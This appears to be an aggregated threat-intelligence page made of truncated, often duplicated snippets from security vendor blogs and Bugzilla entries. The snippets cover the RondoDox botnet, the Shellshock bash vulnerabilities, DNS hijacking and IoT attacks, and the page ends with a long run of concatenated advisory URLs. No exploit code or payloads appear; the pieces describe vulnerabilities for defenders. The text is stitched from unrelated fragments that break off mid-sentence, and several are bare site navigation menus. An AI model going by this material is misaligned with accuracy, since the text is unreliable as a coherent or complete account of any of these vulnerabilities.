RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus Oct 09, 2025 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022 .
Januar
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
The Trend Zero Day Initiative™ (ZDI) and Trend™ Research teams have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus Oct 09, 2025 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Ow
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
# RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus
2025/10/09
Read time: ( words)
Save to Folio
Key takeaways
- The campaign exposes organizations to the risks of data exfiltration, persistent network compromise, and operational disruption for organizations with exposed infrastructure.
- Organizations operating internet-facing network devices are at heightened risk. Active exploitation has been observed globally since mid-2025, with several CVEs now included in CISA’s Known Exploited Vul
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus 2025/10/09 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022 .
January
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Ciberamenazas
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
The Trend Zero Day Initiative™ (ZDI) and Trend™ Research teams have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus Oct 09, 2025 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Ow
Greynoiseio
Coordinated Cloud-Based Scanning Operation Targets 75 Known Exposure Points in One Day
blogs_greynoiseio·2025-05-27
Coordinated Cloud-Based Scanning Operation Targets 75 Known Exposure Points in One Day
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Sentinelone
Prioritizing CVEs in the Cloud
blogs_sentinelone·2025-05-15
Prioritizing CVEs in the Cloud
## Foreword & Guest Bio
As part of this ongoing series, SentinelOne is excited to present a series of guest blogs from cloud security experts covering their views on cloud security best practices. Following on from blogs from Teri Radichel who focused on what AWS security gotchas to avoid and how to address the risk of faulty logic. We now have Rami McCarthy providing his view on cloud CVEs, and approach to vulnerability prioritization.
Rami is a self-proclaimed “security wonk”. Most recently, he helped build the Infrastructure Security program at Figma. Before that, he worked as a security consultant and helped scale security for a health-tech unicorn. He writes extensively about security over at ramimac.me and elsewhere.
## Introduction
Common Vulnerabilities and Exposures (CVEs) are
Sentinelone
Prioritizing CVEs in the Cloud
blogs_sentinelone·2025-05-15
Prioritizing CVEs in the Cloud
## Foreword & Guest Bio
As part of this ongoing series, SentinelOne is excited to present a series of guest blogs from cloud security experts covering their views on cloud security best practices. Following on from blogs from Teri Radichel who focused on what AWS security gotchas to avoid and how to address the risk of faulty logic. We now have Rami McCarthy providing his view on cloud CVEs, and approach to vulnerability prioritization.
Rami is a self-proclaimed “security wonk”. Most recently, he helped build the Infrastructure Security program at Figma. Before that, he worked as a security consultant and helped scale security for a health-tech unicorn. He writes extensively about security over at ramimac.me and elsewhere.
## Introduction
Common Vulnerabilities and Exposures (CVEs) are
Tenable
From Bugs to Breaches: 25 Significant CVEs As MITRE CVE Turns 25
blogs_tenable·2024-10-22
From Bugs to Breaches: 25 Significant CVEs As MITRE CVE Turns 25
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
#### Table of Contents
- Stats on the Top 20 Vulnerable Vendors & By-Products
- Top Twenty Most Targeted by Attackers
- TruRisk Dashboard
- Key Insights & Takeaways
- References
- Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the curre
Qualys
Qualys Top 20 Most Exploited Vulnerabilities
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Qualys Top 20 Most Exploited Vulnerabilities
## Table of Contents
Stats on the Top 20 Vulnerable Vendors & By-Products
Top Twenty Most Targeted by Attackers
TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.
Tenable
Sea Turtle DNS Hijacking Campaign Utilizes At Least Seven Patched Vulnerabilities
blogs_tenable·2019-04-19
Sea Turtle DNS Hijacking Campaign Utilizes At Least Seven Patched Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Talos
DNS Hijacking Abuses Trust In Core Internet Service
blogs_talos·2019-04-17
DNS Hijacking Abuses Trust In Core Internet Service
By Danny Adamitis, David Maynor, Warren Mercer, Matthew Olney and Paul Rascagneres.
Update 4/18: A correction has been made to our research based on feedback from Packet Clearing House, we thank them for their assistance
## Preface
This blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has the potential to undermine the trust users have on the inter
Talos
DNS Hijacking Abuses Trust In Core Internet Service
blogs_talos·2019-04-17
DNS Hijacking Abuses Trust In Core Internet Service
## DNS Hijacking Abuses Trust In Core Internet Service
By Danny Adamitis , David Maynor , Warren Mercer , Matthew Olney and Paul Rascagneres . Update 4/18: A correction has been made to our research based on feedback from Packet Clearing House, we thank them for their assistance
## Preface
This blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has t
Trendmicro
Drupal Bug Exploited to Deliver Monero-Mining Malware
blogs_trendmicro·2018-06-21·CVSS 9.8
CVE-2018-7602 [CRITICAL] Drupal Bug Exploited to Deliver Monero-Mining Malware
Malware
# Drupal Bug Exploited to Deliver Monero-Mining Malware
We were able to observe a series of network attacks exploiting, a security flaw (CVE-2018-7602) in the Drupal content management framework. For now, these attacks aim to turn affected systems into Monero-mining bots.
By: Smart Home Network Team, IoT Reputation Service Team
2018/06/21
Read time: ( words)
Save to Folio
We were able to observe a series of network attacks exploiting CVE-2018-7602, a security flaw in the Drupal content management framework. For now, these attacks aim to turn affected systems into Monero-mining bots. Of note are its ways of hiding behind the Tor network to elude detection and how it checks the affected system first before infecting it with a cryptocurrency-mining malware. While these attacks c
Securelist
Honeypots and the Internet of Things
blogs_securelist·2017-06-19
Honeypots and the Internet of Things
Table of Contents
Threat to the end user
The main problems of smart devices
Firmware
Passwords, telnet and SSH
Statistics
Geography of infected devices
Geographical distribution of server IP addresses from which malware is downloaded to devices
Distribution of attack activity by days of the week
Conclusion
Authors
Vladimir Kuskov
Mikhail Kuzin
Yaroslav Shmelev
Denis Makrushin
Igor Grachev
## Analysis of data harvested by Kaspersky Lab’s IoT honeytraps
There were a number of incidents in 2016 that triggered increased interest in the security of so-called IoT or ‘smart’ devices. They included, among others, the record-breaking DDoS attacks against the French hosting provider OVH and the US DNS provider Dyn. These attacks are known to have been launched with the help of a mas
Securelist
Honeypots and the Internet of Things
blogs_securelist·2017-06-19
Honeypots and the Internet of Things
Table of Contents
- Threat to the end user
- The main problems of smart devices
- Passwords, telnet and SSH
- Statistics
- Geography of infected devices
- Geographical distribution of server IP addresses from which malware is downloaded to devices
- Distribution of attack activity by days of the week
- Conclusion
Authors
- Vladimir Kuskov
- Mikhail Kuzin
- Yaroslav Shmelev
- Denis Makrushin
- Igor Grachev
## Analysis of data harvested by Kaspersky Lab’s IoT honeytraps
There were a number of incidents in 2016 that triggered increased interest in the security of so-called IoT or ‘smart’ devices. They included, among others, the record-breaking DDoS attacks against the French hosting provider OVH and the US DNS provider Dyn. These attacks are known to have been launched with the help o
Zscaler
#BASHed Evolution Of Shellshock Attack Payloads | Zscaler
blogs_zscaler·2014-10-07·CVSS 9.8
[CRITICAL] #BASHed Evolution Of Shellshock Attack Payloads | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Talos
Shellshock Exploits in the Wild
blogs_talos·2014-09-30·CVSS 9.8
CVE-2014-6271 [CRITICAL] Shellshock Exploits in the Wild
## Shellshock Exploits in the Wild
This post was authored by Joel Esler & Martin Lee .
The recently discovered Bash vulnerability ( CVE-2014-6271 ) potentially allows attackers to execute code on vulnerable systems. We have already blogged about the issue and provided more technical detail in a further blog . The rapid release of IPS signatures for our platforms allowed us to follow very quickly, the attempts at exploitation of the vulnerability in the wild.
For further details of our response to the issue, please see the Event Response Page .
Analysing our IPS telemetry shows that exploitation was detectable as early as Wednesday 24 September 04:00 GMT, reaching a peak on Friday 26 September 04:00 GMT, before tailing off over the weekend and spiking on Sunday 28 September 16:00 GMT. A
Talos
Shellshock Exploits in the Wild
blogs_talos·2014-09-30·CVSS 9.8
CVE-2014-6271 [CRITICAL] Shellshock Exploits in the Wild
This post was authored by Joel Esler & Martin Lee.
The recently discovered Bash vulnerability (CVE-2014-6271) potentially allows attackers to execute code on vulnerable systems. We have already blogged about the issue and provided more technical detail in a further blog. The rapid release of IPS signatures for our platforms allowed us to follow very quickly, the attempts at exploitation of the vulnerability in the wild.
For further details of our response to the issue, please see the Event Response Page.
Analysing our IPS telemetry shows that exploitation was detectable as early as Wednesday 24 September 04:00 GMT, reaching a peak on Friday 26 September 04:00 GMT, before tailing off over the weekend and spiking on Sunday 28 September 16:00 GMT. Attempted exploitation of the vulnerabilit
Talos
Shellshock - Update Bash Immediately!
blogs_talos·2014-09-26
Shellshock - Update Bash Immediately!
Shellshock is a serious vulnerability. Bash, arguably the most widely distributed shell on Linux systems, fails to correctly parse environment variables with function declarations. Why the fuss over environment variables? Because these variables are often set by programs that handle network data. Examples include dhcpcd which, through this vulnerability, more or less gives you a remote shell through DHCP option 114 (and potentially others) and Apache using mod_cgi or mod_cgid when CGI scripts are either written in Bash, or otherwise spawn subshells with exported data acquired from untrusted sources -- to name a few.
The problem is located in variables.c
void
initialize_shell_variables (env, privmode)
char **env;
int privmode;
{
[...truncated...]
If an environment variable starts with th
Talos
Shellshock - Update Bash Immediately!
blogs_talos·2014-09-26
Shellshock - Update Bash Immediately!
## Shellshock - Update Bash Immediately!
Shellshock is a serious vulnerability. Bash, arguably the most widely distributed shell on Linux systems, fails to correctly parse environment variables with function declarations. Why the fuss over environment variables? Because these variables are often set by programs that handle network data. Examples include dhcpcd which, through this vulnerability, more or less gives you a remote shell through DHCP option 114 (and potentially others) and Apache using mod_cgi or mod_cgid when CGI scripts are either written in Bash, or otherwise spawn subshells with exported data acquired from untrusted sources -- to name a few.
The problem is located in variables.c
void initialize_shell_variables (env, privmode) char **env; int privmode; { [...truncated...]
Tenable
Detecting Shellshock with LCE Process Accounting
blogs_tenable·2014-09-25
Detecting Shellshock with LCE Process Accounting
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Talos
Another Major Vulnerability Bashes Systems
blogs_talos·2014-09-25·CVSS 9.8
CVE-2014-6271 [CRITICAL] Another Major Vulnerability Bashes Systems
## Another Major Vulnerability Bashes Systems
Vulnerabilities that permit remote network attacks against ubiquitous software components are the nightmares of security professionals. On 24 September the presence of a new vulnerability, CVE-2014-6271 in Bash shell allowing remote code execution was disclosed.
The Bash shell is commonly included in many Linux distributions to allow remote users to interact with the system after logging in. As part of its functionality, Bash allows for environment variables that are commonly used to hold values describing the set-up of the shell for easy access by a user or software. Bash also contains limited programming functionality allowing the creation of functions that can be called to execute instructions. The vulnerability occurs during the initiatio
Unit42
Palo Alto Networks Addresses Bash Vulnerability Shellshock: Mitigation for CVE-2014-6271
blogs_unit42·2014-09-25·CVSS 9.8
CVE-2014-6271 [CRITICAL] Palo Alto Networks Addresses Bash Vulnerability Shellshock: Mitigation for CVE-2014-6271
Around 6:00 am PST on September 24, the details of a vulnerability in the widely used Bourne Again Shell (Bash) were disclosed by multiple Linux vendors. The vulnerability, assigned CVE-2014-6271 by Mitre, was originally discovered by Stephane Chazelas, a Unix and Linux network and telecom administrator and IT manager at UK robotics company SeeByte, Ltd.
While this vulnerability didn’t come with quite the fanfare or a catchy name like Heartbleed, the security community quickly dubbed it “Shellshock.” Bash is present in most Linux and Unix distributions as well as Apple’s Mac OS X, and there’s a good chance anyone reading this has a system they need to patch.
Palo Alto Networks initiated an emergency IPS content release to detect this vulnerability last night with Signature ID: 36729 "Bas
Talos
Another Major Vulnerability Bashes Systems
blogs_talos·2014-09-25·CVSS 9.8
CVE-2014-6271 [CRITICAL] Another Major Vulnerability Bashes Systems
Vulnerabilities that permit remote network attacks against ubiquitous software components are the nightmares of security professionals. On 24 September the presence of a new vulnerability, CVE-2014-6271 in Bash shell allowing remote code execution was disclosed.
The Bash shell is commonly included in many Linux distributions to allow remote users to interact with the system after logging in. As part of its functionality, Bash allows for environment variables that are commonly used to hold values describing the set-up of the shell for easy access by a user or software. Bash also contains limited programming functionality allowing the creation of functions that can be called to execute instructions. The vulnerability occurs during the initiation of a Bash shell for a user, when the environm
Tenable
Detecting Shellshock with LCE Process Accounting
blogs_tenable·2014-09-25·CVSS 9.8
[CRITICAL] Detecting Shellshock with LCE Process Accounting
Blog /
Subscribe
# Detecting Shellshock with LCE Process Accounting
Rich Walchuck
September 25, 2014
3 Min Read
A critical vulnerability in bash (Bourne Again SHell) versions through 4.3, the default shell for many Linux and other Unix distributions (including Mac OS X), presents a critical security concern for network-attached devices that use bash, especially those with an attack vector that can be exploited remotely (e.g., web servers, SSH servers, and likely much more). The key focus is that the attacker has to have a remote interface that will call bash to exploit the vulnerability. The bigger concern is that in the Unix world, that includes a lot of services. While Windows-based systems do not include bash by default, they may have an add-on bash (Cygwin, win-bash) program that
Unit42
Palo Alto Networks Addresses Bash Vulnerability Shellshock: Mitigation for CVE-2014-6271
blogs_unit42·2014-09-25·CVSS 9.8
CVE-2014-6271 [CRITICAL] Palo Alto Networks Addresses Bash Vulnerability Shellshock: Mitigation for CVE-2014-6271
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Addresses Bash Vulnerability Shellshock: Mitigation for CVE-2014-6271
Ryan Olson
Published: September 25, 2014
Threat Research
Vulnerabilities
Apache
Bash
CVE-2014-6271
Linux
Mac OS X
MITRE
OpenSSH
PAN-OS
Panorama
Shellshock
Unix
Around 6:00 am PST on September 24, the details of a vulnerability in the widely used Bourne Again Shell (Bash) were disclosed by multiple Linux vendors. The vulnerability, assigned CVE-2014-6271 by Mitre, was originally discovered by Stephane Chazelas, a Unix and Linux network and telecom administrator and IT manager at UK robotics company SeeByte, Ltd.
While this vulnerability didn’t come with quite the fanfare or a catchy name like Heartbleed , the security commun
Zscaler
Shellshock Attacks Spotted In Wild [Updated Sept 26] | Zscaler
blogs_zscaler·2014-09-25·CVSS 9.8
[CRITICAL] Shellshock Attacks Spotted In Wild [Updated Sept 26] | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Volexity
CVE-2014-6271 - Remotely Exploitable Vulnerability in Bash
blogs_volexity·2014-09-24·CVSS 9.8
CVE-2014-6271 [CRITICAL] CVE-2014-6271 - Remotely Exploitable Vulnerability in Bash
Threat Intelligence
## CVE-2014-6271 – Remotely Exploitable Vulnerability in Bash
September 24, 2014
Volexity
With the excitement of public details of a remotely exploitable vulnerability in bash ( CVE-2014-6271) coming to light today, we decided it was as good of time as any to finally launch Volexity’s blog. We have a lot of exciting announcements and posts coming, but for now we turn our attention to bash. Today’s announcement and release of related patches may ultimately unleash something that rivals HeartBleed . While that still remains to be seen, the time for action from system administrators is now .
## Are You Vulnerable?
If you haven’t patched today, then the answer is most likely yes . However, double checking if this is the case is rather simple. If you want to find out i
Volexity
CVE-2014-6271 - Remotely Exploitable Vulnerability in Bash
blogs_volexity·2014-09-24·CVSS 9.8
CVE-2014-6271 [CRITICAL] CVE-2014-6271 - Remotely Exploitable Vulnerability in Bash
Threat Intelligence
# CVE-2014-6271 – Remotely Exploitable Vulnerability in Bash
September 24, 2014
Volexity
With the excitement of public details of a remotely exploitable vulnerability in bash (CVE-2014-6271) coming to light today, we decided it was as good of time as any to finally launch Volexity’s blog. We have a lot of exciting announcements and posts coming, but for now we turn our attention to bash. Today’s announcement and release of related patches may ultimately unleash something that rivals HeartBleed. While that still remains to be seen, the time for action from system administrators is now.
## Are You Vulnerable?
If you haven’t patched today, then the answer is most likely yes. However, double checking if this is the case is rather simple. If you want to find out if you
Huntress
CVE-2014-6271 (Shellshock): Analysis, Detection & Prevention | Huntress
blogs_huntress·CVSS 9.8
CVE-2014-6271 [CRITICAL] CVE-2014-6271 (Shellshock): Analysis, Detection & Prevention | Huntress
## CVE-2014-6271 Vulnerability
Published: 11/07/2025
Written by: Nadine Rozell
## What is CVE-2014-6271 Vulnerability?
CVE-2014-6271 , better known by its notorious nickname "Shellshock," is a beast of a vulnerability affecting the GNU Bash shell. If you're not familiar, Bash is the default command-line interface for nearly every Linux and macOS system out there. Shellshock is a remote code execution (RCE) flaw that allows an attacker to run arbitrary commands on a vulnerable system.
Think of it like this: an attacker can sneak malicious code into an environment variable. When a vulnerable version of Bash processes this variable, it executes the hidden command with the same privileges as the running service. Given how many web servers (Apache), SSH services, and DHCP clients use Bash
Bugzilla
CVE-2014-6277 bash: uninitialized here document closing delimiter pointer use
bugzilla·2014-09-28·CVSS 9.8
CVE-2014-6277 [CRITICAL] CVE-2014-6277 bash: uninitialized here document closing delimiter pointer use
CVE-2014-6277 bash: uninitialized here document closing delimiter pointer use
Common Vulnerabilities and Exposures assigned an identifier CVE-2014-6277 to
the following vulnerability:
Name: CVE-2014-6277
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277
Assigned: 20140909
Reference: http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html
GNU Bash through 4.3 bash43-026 does not properly parse function
definitions in the values of environment variables, which allows
remote attackers to execute arbitrary code or cause a denial of
service (uninitialized memory access, and untrusted-pointer read and
write operations) via a crafted environment, as demonstrated by
vectors involving the ForceCommand feature in OpenSSH sshd, the
mod_cgi and mod_cgid modules i
Bugzilla
CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271)
bugzilla·2014-09-25·CVSS 9.8
CVE-2014-7169 [CRITICAL] CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271)
CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271)
It was found the patch applied to fix CVE-2014-6271 was incomplete and could still allow some characters to be injected into another environment. An attacker could use this flaw to bypass some security restrictions, such as access files which he previously does not have access to etc (Standard file system permissions and selinux if enabled prevail though). There is no proof that this flaw could be used to execute arbitrary code, if it does it should be very difficult to exploit and depend on the specific configuration of the service.
Reference:
http://www.openwall.com/lists/oss-security/2014/09/24/40
https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c23
Discussion:
Created bash tr
Bugzilla
CVE-2014-7169 bash: Code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271) [fedora-all]
bugzilla·2014-09-25·CVSS 9.8
CVE-2014-7169 [CRITICAL] CVE-2014-7169 bash: Code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271) [fedora-all]
CVE-2014-7169 bash: Code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271) [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue
Bugzilla
CVE-2014-6271 bash: specially-crafted environment variables can be used to inject shell commands
bugzilla·2014-09-15·CVSS 9.8
CVE-2014-6271 [CRITICAL] CVE-2014-6271 bash: specially-crafted environment variables can be used to inject shell commands
CVE-2014-6271 bash: specially-crafted environment variables can be used to inject shell commands
A flaw was found in the bash functionality that evaluates specially formatted environment variables passed to it from another environment.
An attacker could use this feature to override or bypass restrictions to the environment to execute shell commands before restrictions have been applied. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.
Acknowledgements:
Red Hat would like to thank Stephane Chazelas for reporting this issue.
Discussion:
Created attachment 937490
Proposed upstream patch
---
Created attachment 938968
funcdef-import-3.0.patch
Upstream backport to bash 3.0
---
Created attachm
http://advisories.mageia.org/MGASA-2014-0388.htmlhttp://archives.neohapsis.com/archives/bugtraq/2014-10/0101.htmlhttp://jvn.jp/en/jp/JVN55667175/index.htmlhttp://jvndb.jvn.jp/jvndb/JVNDB-2014-000126http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10673http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.htmlhttp://linux.oracle.com/errata/ELSA-2014-1293.htmlhttp://linux.oracle.com/errata/ELSA-2014-1294.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00028.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00029.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00034.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00037.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00040.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00044.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00049.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-10/msg00004.htmlhttp://lists.opensuse.org/opensuse-updates/2014-10/msg00023.htmlhttp://lists.opensuse.org/opensuse-updates/2014-10/msg00025.htmlhttp://marc.info/?l=bugtraq&m=141216207813411&w=2http://marc.info/?l=bugtraq&m=141216668515282&w=2http://marc.info/?l=bugtraq&m=141235957116749&w=2http://marc.info/?l=bugtraq&m=141319209015420&w=2http://marc.info/?l=bugtraq&m=141330425327438&w=2http://marc.info/?l=bugtraq&m=141330468527613&w=2http://marc.info/?l=bugtraq&m=141345648114150&w=2http://marc.info/?l=bugtraq&m=141383026420882&w=2http://marc.info/?l=bugtraq&m=141383081521087&w=2http://marc.info/?l=bugtraq&m=141383138121313&w=2http://marc.info/?l=bugtraq&m=141383196021590&w=2http://marc.info/?l=bugtraq&m=141383244821813&w=2http://marc.info/?l=bugtraq&m=141383304022067&w=2http://marc.info/?l=bugtraq&m=141383353622268&w=2http://marc.info/?l=bugtraq&m=141383465822787&w=2http://marc.info/?l=bugtraq&m=141450491804793&w=2http://marc.info/?l=bugtraq&m=141576728022234&w=2http://marc.info/?l=